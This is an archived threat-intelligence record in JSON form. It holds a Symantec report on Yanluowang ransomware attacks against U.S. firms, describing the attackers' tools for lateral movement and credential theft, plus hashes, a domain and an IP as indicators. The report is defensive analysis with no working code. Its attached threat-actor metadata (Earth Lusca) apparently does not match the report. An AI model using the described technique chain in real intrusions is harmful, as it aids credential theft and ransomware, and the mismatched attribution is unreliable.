{
	"id": "59da283a-2855-4f4a-8c9e-be28312614b9",
	"created_at": "2026-04-06T01:32:27.906959Z",
	"updated_at": "2026-04-10T03:36:47.863268Z",
	"deleted_at": null,
	"sha1_hash": "933fddcfd431eb68dc5a5918d34ad5a613d22177",
	"title": "Yanluowang: Further Insights on New Ransomware Threat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 39821,
	"plain_text": "Yanluowang: Further Insights on New Ransomware Threat\r\nBy About the Author\r\nArchived: 2026-04-06 00:31:17 UTC\r\nYanluowang, the ransomware recently discovered by Symantec, a division of Broadcom Software, is now being\r\nused by a threat actor that has been mounting targeted attacks against U.S. corporations since at least August 2021.\r\nThe attacker uses a number of tools, tactics, and procedures (TTPs) that were previously linked to Thieflock\r\nransomware attacks, suggesting that they may have been a Thieflock affiliate who shifted allegiances to the new\r\nYanluowang ransomware family.\r\nThe attackers have been heavily focused on organizations in the financial sector but have also targeted companies\r\nin the manufacturing, IT services, consultancy, and engineering sectors.\r\nLateral movement\r\nIn most cases, PowerShell is used to download tools to compromised systems including BazarLoader to assist in\r\nreconnaissance. The attackers then enable RDP via registry to enable remote access. After gaining initial access,\r\nthe attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.\r\nIn order to perform lateral movement and identify systems of interest, such as the victim’s Active Directory server,\r\nthe attackers deploy Adfind, a free tool that can be used to query Active Directory, and SoftPerfect Network\r\nScanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.\r\nThe next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools,\r\nincluding:\r\nGrabFF: A tool that can dump passwords from Firefox\r\nGrabChrome: A tool that can dump passwords from Chrome\r\nBrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers\r\nAlong with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script\r\nto copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping\r\ntools were also observed (secretsdump.exe). Credentials were also dumped from the registry.\r\nIn addition, the attackers have also used a number of other data capture tools, including a screen capture tool and a\r\nfile exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted\r\norganization.\r\nOther tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled\r\ninfrastructure, and the free, Chromium-based Cent web browser.\r\nThe Thieflock connection\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\r\nPage 1 of 3\n\nThere is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, ransomware-as-a-service developed by the Canthroid (aka Fivehands) group. Several TTPs used by these attackers overlap with\r\nTTPs used in Thieflock attacks, including:\r\nUse of custom password recovery tools such as GrabFF and other open-source password dumping tools\r\nUse of open-source network scanning tools (SoftPerfect Network Scanner)\r\nUse of free browsers, such as s3browser and Cent browser\r\nThis link begs the question of whether Yanluowang was developed by Canthroid. However, analysis of\r\nYanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely\r\nhypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate.\r\nProtection\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\na710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789 – NetScan\r\n2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04 – Adfind\r\n43f8a66d3f3f1ba574bc932a7bc8e5886fbeeab0b279d1dea654d7119e80a494 – BazarLoader\r\n9aa1f37517458d635eae4f9b43cb4770880ea0ee171e7e4ad155bbdee0cbe732 – Veeamp\r\n85fb8a930fa7f4c32c8af86aa204eb4ea4ae404e670a8be17e7ae0adf37a9e2e – GrabFF\r\ne4942fde1cd7f2fcfb522090fd16298bce247295fe99182aecf7b10be3f5dc53 – ConnectwiseInstaller\r\nfe38912d64f6d196ac70673cd2edbdbc1a63e494a2d7903546a6d3afa39dc5c4 – WmiExecAgent\r\nc77ff8e3804414618abeae394d3003c4bb65a43d69c57c295f443aeb14eaa447 – NetScan\r\n2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03 – Secretsdump\r\n4ff503258e23d609e0484ee5df70a1db080875272ab6b4db31463d93ebc3c6dd – GrabFile\r\n1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3 – GrabChrome\r\n0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4 – OpenChromeDumps\r\nb556d90b30f217d5ef20ebe3f15cce6382c4199e900b5ad2262a751909da1b34 – BrowserPassView\r\n5e03cea2e3b875fdbf1c142b269470a9e728bcfba1f13f4644dcc06d10de8fb4 – ConHost\r\n49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d – Yanluowang\r\nmyeeducationplus.com\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\r\nPage 2 of 3\n\n185.53.46.115    \r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue"
	],
	"report_names": [
		"yanluowang-ransomware-attacks-continue"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439147,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.pdf",
		"text": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.txt",
		"img": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.jpg"
	}
}